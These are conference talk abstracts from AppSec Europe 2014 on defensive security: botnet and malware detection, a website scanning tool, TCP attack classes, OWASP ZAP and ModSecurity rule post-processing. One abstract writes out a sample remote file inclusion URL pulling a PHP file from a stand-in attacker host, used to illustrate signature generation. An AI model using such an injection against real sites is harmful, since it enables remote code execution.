AppSec Europe 2014

Traditional techniques for detecting malware, such as viruses, worms and rootkits, rely on identifying virus-specific signature definitions within network traffic, applications or memory. Because a sample of malware is required to define an attack signature, signature detection has drawbacks when accounting for morphism, has limited use in Zero-Day protection and is a post-infection technique requiring malware to be present on a network, or device, in order to be detected. 

Botnets are ideally suited for launching mass Distributed Denial of Services (DDoS) attacks against the ever increasing number of networked devices that are starting to form the Internet of Things, and ultimately Smart Cities. Regardless of topology; centralised with Command & Control servers (C&C), or distributed peer-to-peer (P2P), Bots must communicate with the other Bots in the Botnet, as well as their overall commanding Botmaster. This communication traffic can be used to detect malware activity in the cloud well before it has been able to evade network perimeter defences, and to determine a route back to source to take down the threat. 

This presentation highlights the main drawbacks of traditional signature based detection methods. It discusses the alternative techniques of cloud based traffic analysis for pre-infection detection of malware, in particular Botnets, which can be performed on Big Data being generated by Service Providers, and demonstrates how cloud centric traffic based detection techniques can be used to complement traditional signature based anti-malware and overcome some of its drawbacks. 

Finally, this presentation identifies a lack of techniques for detecting malicious Bot activity within virtual environments, which now form the backbone of data centre infrastructure, and provide a new, as of yet untapped, attack vector for future malware. This identification of a lack of techniques works as a pre-cursor to my PhD research which is to detect malware behaviour within virtual environments. 

It’s estimated that 86% of all websites had at least a serious vulnerability during 2012. Attackers either manually or automatically (via botnets) deploy C&C servers and malware droppers within exploited websites to infect clients. When such an intrusion is not detected by the owner, the website can deliver malware for long periods until somebody either privately or publicly notices it and maybe an investigation starts. 

To tackle this, we have developed a web monitoring tool called WebDetector, that can be scheduled to run periodically over a list of domain names and to produce a score that indicates how malicious a page is. 

The tool is currently written in python and relies on several open source components for mirroring, file tracking and indexing plus a set of heuristics to detect harmful components like javascripts, PDF, shockwaves, form spoofing and link redirection. The framework can be expanded with modular signatures to detect in future more types of attacks with the help of the community. 

We have tested the efficacy of WebDetector by deliberately adding common malicious behaviour in a controlled Wordpress installation. More sophisticated malware strategies needs refined heuristics for detection that will be addressed in future. 

On the global Internet, the main function of TCP is to provide a reliable byte stream process to process communication. Today, TCP is the most widespread protocol used for exchanging data in the Internet and almost responsible for more than 90 percent of the world's total data traffic on the Internet. Despite its widespread usage, many of the TCP protocols were designed with little consideration given to the security implications. For example, the TCP protocol stack could be vulnerable to a variety of attacks ranging from IP spoofing to denial of service.

This paper classifies a range of known TCP attack methods focusing in particular on password sniffing, SYN flooding, IP spoofing, TCP sequence number attack, TCP session hijacking, RST/FIN attacks and the low rate TCP targeted denial of service attack. . The paper will also examine the vulnerability points of these TCP protocols in attempting to provide solutions to such attacks. Finally, a real time network simulation infrastructure will be provided along with detail experiments analysis to validate the efficiency of our security approaches. 

The Zed Attack Proxy (ZAP) is an OWASP Flagship project and the largest open source web application security tool measured by active contributors. While it is an ideal tool for people new to appsec it also has many features specifically intended for advanced penetration testing. 

In this talk Simon will give a quick introduction to ZAP and then dive into some of these features, including: 
* Handling single page and other ‘non standard’ apps 
* Client side testing with Plug-n-Hack 
* Advanced scanning options 
* Contexts 
* Fuzzing 
* Scripting 
* Zest - ZAP’s macro language 
* Changing the source code 

ModSecurity Web Application Firewall was first released more than a decade ago, available as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and is the most widely deployed WAF, protecting millions of websites. A long side ModSecurity engine we can also find OWASP ModSecurity Core Rule Set (CRS), which is a library of generic application security signatures that provide a base level of protection for any web application.

In this presentation I will show an advanced technique for post processing of ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses that are derived from WAF triggers. The objective of the post processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights on our attackers and the techniques they use and as a result we can harden defenses that will improve our mitigations.

The presentation will include detailed description of several techniques with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example for analysis on remote file inclusion attack:

When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continues attack campaign that uses various RFI vulnerabilities with the same remote file.

Generating signature that matches attacks based on the attack "anchor" can improve the detection capabilities for ModSecurity CRS and at the same time give better insight on the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php

In the attack above we can see remote source file located on “www.attacker.com/malicous.php”, using this malicious file can be valuable when:

• 
  Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)
  
  


• 
  Blocking traffic from within the organization to the attacker web application
  
  


• 
  Correlating similar attacks as same distributed attack campaign 
  
  

This paper describes a novel method of autonomously detecting malicious Botnet behaviour within a Cloud datacentre, while at the same time managing Virtual Machine (VM) placement in accordance to its findings, and it presents its implementation with the Scala programming language. A key feature of this method, using output from Netflow/IPFix, both of which are capable of producing detailed network traffic logs, is its capability of detecting unusual Client behaviour through the analysis of individual data packet information.

It has been implemented as a module of an Autonomous Management Distributed System (AMDS) presented in [Dinita, R. I., Wilson, G., Winckles, A., Cirstea, M., Rowsell, T. (2013)], giving it direct access to all the VMs and Hypervisors on the Cloud network. As such, another key feature is that it can have an immediate and effective impact on network security in a Botnet attack context by issuing lockout commands to every networked VM through the AMDS. A proof of concept has been developed and is currently running successfully on the authors’ test bed.